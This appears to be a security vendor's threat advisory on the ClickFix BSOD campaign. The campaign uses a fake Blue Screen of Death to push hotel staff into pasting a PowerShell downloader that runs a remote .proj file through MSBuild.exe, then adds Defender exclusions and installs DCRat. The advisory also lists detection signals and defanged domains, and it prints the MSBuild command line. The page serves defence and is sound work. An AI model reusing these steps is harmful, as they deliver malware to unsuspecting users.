DomainGuard

ClickFix BSOD (Fake Blue Screen of Death)

An aggressive variant of the ClickFix technique that uses a fake Windows Blue Screen of Death (BSOD) overlay to pressure victims into executing malicious PowerShell commands via MSBuild.

A fake Windows Blue Screen of Death (BSOD) overlay used to trick victims into running malicious commands.
A fake Windows Blue Screen of Death (BSOD) overlay used to trick victims into running malicious commands.
First Seen
2026
Status
Active in the wild
ClickFix BSOD PowerShell MSBuild DCRat Social Engineering 5 min read

What it is

ClickFix BSOD is a high-pressure evolution of the ClickFix social engineering technique. While standard ClickFix lures often mimic browser updates or CAPTCHA checks, the BSOD variant leverages a fake Windows Blue Screen of Death (BSOD) to create a sense of critical system failure.

The attack primarily targets the hospitality and travel sectors, often impersonating brands like Booking.com. Victims are led to believe their system has crashed or their browser is incompatible, and they are provided with a “fix” that involves pasting a malicious command into their terminal. This technique is designed to bypass traditional web security controls by having the user manually initiate the malware delivery.

How it works

  1. Travel-Themed Lure. The attack often begins with a phishing email impersonating a travel platform (e.g., Booking.com) sent to hotel or property management staff. The email claims there is an urgent issue with a reservation that requires immediate attention.

  2. Urgency-Driven Landing Page. Clicking the link leads to a phishing site (e.g., low-house[.]com) that reinforces the pressure with messages like “YOUR RESERVATION WILL BE CANCELLED.”

  3. Fake BSOD Overlay. The site triggers a full-screen overlay that mimics a Windows BSOD. The overlay displays a QR code and a set of instructions to “restore the system.”

    Fake Windows BSOD overlay displaying fraudulent recovery instructions.
    Fake Windows BSOD overlay displaying fraudulent recovery instructions.

  4. The “Fix” Instruction. The victim is instructed to open the Windows Run dialog (Win+R), paste a pre-copied command, and press Enter. This command is a PowerShell downloader.

  5. MSBuild Proxy Execution. The pasted PowerShell command downloads a malicious Microsoft Build Engine (.proj) file from an attacker-controlled server (e.g., 2fa-bns[.]com). It then executes this file using MSBuild.exe:

    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe v.proj

  6. Malware Deployment. By using MSBuild.exe, the attackers can bypass many endpoint security policies that restrict direct PowerShell or script execution. The .proj file contains inline code that:

    • Configures Microsoft Defender exclusions for the malware’s working directory.
    • Establishes persistence on the host.
    • Downloads and executes the final payload, typically DCRat (a remote access trojan).

Why it still works

  • High-Stakes Context. By targeting hotel staff with reservation cancellations, attackers ensure the victim is in a reactive, high-stress state.
  • System-Level Authority. A BSOD is one of the most recognized and feared system errors. The victim’s focus shifts from “is this website real?” to “my computer is broken.”
  • Living-off-the-Land (LotL). Using MSBuild.exe to execute the payload is a classic LotL technique. Since MSBuild is a legitimate Microsoft tool, its execution is often trusted by default, and it can be used to run malicious code without a dedicated binary being caught by traditional AV signatures.

Signals to watch for

  • Browser-Based BSODs. A real Windows BSOD will never occur inside a web browser window. If you can see browser UI elements or if the BSOD disappears when you close the tab, it is a scam.
  • Instructions to use MSBuild. Legitimate technical support will almost never ask a user to run MSBuild.exe via the Run dialog to fix a system error.
  • Unusual Domain Chains. Watch for traffic to randomized or unrelated domains (e.g., 8eh18dhq9wd[.]click) used to host the initial lure or the second-stage .proj files.
  • Defender Exclusions. Any process attempting to add widespread exclusions to Microsoft Defender via PowerShell or registry edits is a major red flag.

Why it appears here

The ClickFix BSOD variant represents a significant shift toward more aggressive, high-friction social engineering. It demonstrates how attackers are moving away from subtle deception toward overt system-error mimicry to force user compliance. We track this campaign because it specifically targets the travel industry and uses advanced proxy-execution techniques that bypass standard security stacks.

Indicators of compromise

Domains

  • low-house[.]com (Initial phishing/BSOD host)
  • 2fa-bns[.]com (Payload delivery)
  • 8eh18dhq9wd[.]click
  • oncameraworkout[.]com
  • asj77[.]com / asj88[.]com / asj99[.]com
  • wmk77[.]com

Technical Indicators

  • Process execution: MSBuild.exe being spawned with a local or remote .proj file path as an argument.
  • Payload file: v.proj (or similar variants).
  • Final Malware: DCRat (Infostealer and RAT capabilities).
All Threats